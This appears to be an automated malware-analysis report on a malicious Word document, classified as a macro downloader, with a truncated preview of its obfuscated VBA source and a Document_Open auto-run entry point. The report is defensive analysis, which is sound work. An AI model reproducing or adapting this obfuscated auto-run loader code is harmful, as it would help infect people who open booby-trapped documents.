MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV heuristic and the presence of VBA macros, specifically a Document_Open macro, indicate malicious intent. The VBA macro code appears to be obfuscated but is designed to download and execute a second-stage payload, as suggested by the 'Doc.Downloader' classification. The benign URLs extracted are not indicative of malicious activity.
Heuristics 4
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13645 bytes |
SHA-256: c2e228e51e65b4d5ba4450fcb8c3e921dfb6e30bda4723f75bff9b8d2519807b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function miscreance(losing) Dim trainbearer As Long Dim beamish As Byte Dim decadent As Long Dim compiler As String #If (57 - 111 + 454 + 46 - 62 + 316) > ((4 - 125 + 441) - (90 - 126 + 576) * 1) And ((51 - 106 + 83) - (72 - 111 + 67)) * 2 < (Win64) Then Dim centuplicate As String Dim shingling As LongPtr paillasse = 109 - 125 + 24 Dim caique As LongPtr Dim nonrestrictive As String Dim istic As Variant Dim birdseye As LongPtr Dim window As String advertising = VarPtr(shingling) Commit = evagation(advertising, VarPtr(losing) + (114 - 58 - 48), paillasse) #ElseIf (48 - 87 + 439 + 71 - 29 + 258) > ((99 - 102 + 323) - (78 - 75 + 537) * 1) And Not ((40 - 80 + 68) - (70 - 45 + 3)) * 2 < (Win64) Then Dim shingling As Long paillasse = 104 - 127 + 27 Dim caique As Long Dim birdseye As Long #End If advertising = VarPtr(shingling) Commit = genre(advertising, VarPtr(losing) + (24 - 125 + 109), paillasse) maidenly = 5 - 121 + 115 caique = 100 - 113 + 13 offuscate = 16 - 67 + 51 birdseye = 114 - 128 + 9932 arrack = 14 - 98 + 4180 quadfiform = 1 - 108 + 171 transitorily = abutting(ByVal maidenly, _ caique, ByVal offuscate, birdseye, ByVal arrack, _ ByVal quadfiform) bathe = "tripalmitin" prosalprosy = dirtily And 423 exchanger = genre(caique, shingling, 82 - 78 + 5879) gath = 17 + 52 Pmt 0, gath, 3616, 33767, 4 miscreance = caique End Function Private Sub Document_Open() Dim doublebogey As Byte Dim discretional As String recordbreaking = crucifer bedeck = tavern reservedly mellifluous = 11 + 34 Pmt 0, mellifluous, 16970, 47194, 2 End Sub Sub reservedly() Dim miscegenate As String Dim guiltridden As Variant activeness.unscoured.Value = Day(#12/5/2013#) varday = morocco = "ho" binge = "moniliales" deconstructionist = "egurgitate" su = "cacodemon" dewey = "harping" bushranger = symbolize alpestrine = cocozelle aphorism = "blebby" Set drunk = activeness.unscoured.SelectedItem dartre = 36 + 42 Pmt 0, dartre, 4082, 44229, 2 militat = drunk.Name precipitously = 113 - 23 + 7754 ambassadorial = Right(militat, precipitously) down = shrilly(ambassadorial) stillroom = 6 + 29 Pmt 0, stillroom, 26422, 14419, 7 marathon = "containerized" #If (12 - 37 + 425 + 109 - 27 + 218) > ((17 - 46 + 349) - (120 - 42 + 462) * 1) And ((95 - 70 + 3) - (8 - 13 + 33)) * 2 < (Win64) Then Dim celllike As Long Dim delire As LongPtr Dim homobasidiomycetes As LongPtr Dim lifeless As Variant #ElseIf (100 - 115 + 415 + 124 - 104 + 280) > ((29 - 33 + 324) - (75 - 92 + 557) * 1) And Not ((114 - 112 + 26) - (58 - 28 - 2)) * 2 < (Win64) Then Dim godmother As Variant Dim homobasidiomycetes As Long Dim dimsightedness As Variant Dim delire As Long #End If ceratozamia = 46 - 45 - 1 dispense = misbelieve foundering = 3 - 31 + 4124 praises = 27 + 19 Pmt 0, praises, 2397, 20766, 5 battledore = "cafeteria" tulu = "sociolinguistics" passive = 34 + 41 Pmt 0, passive, 33175, 52385, 3 joyless = down benzoin = strix delire = miscreance(joyless) matross = scherzo #If (102 - 42 + 340 + 40 - 1 + 261) > ((122 - 23 + 221) - (116 - 14 + 438) * 1) And ((49 - 8 - 13) - (29 - 94 + 93)) * 2 < (Win64) Then Dim anaphor As String Dim grounded As LongPtr Dim worrying As LongPtr Dim gracious As LongPtr ameer = 51 - 112 + 2125 #ElseIf (126 - 31 + 305 + 46 - 20 + 274) > ((59 - 62 + 323) - (72 - 32 + 500) * 1) And Not ((33 - 19 + 14) - (117 - 11 - 78)) * 2 < (Win64) Then Dim grounded As Long omophagia = 111 - 75 + 745 Dim worrying As Long Dim gracious As Long ameer = omophagia + 3459 #End If Dim medieval As Byte Dim opinon As Integer grounded = 112 - 101 - 11 homobasidiomycetes = delire + ameer worrying = 45 - 47 + 201529 gracious = 39 - 89 + 3550 squirming = baptize(worrying, grounded, homoba ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.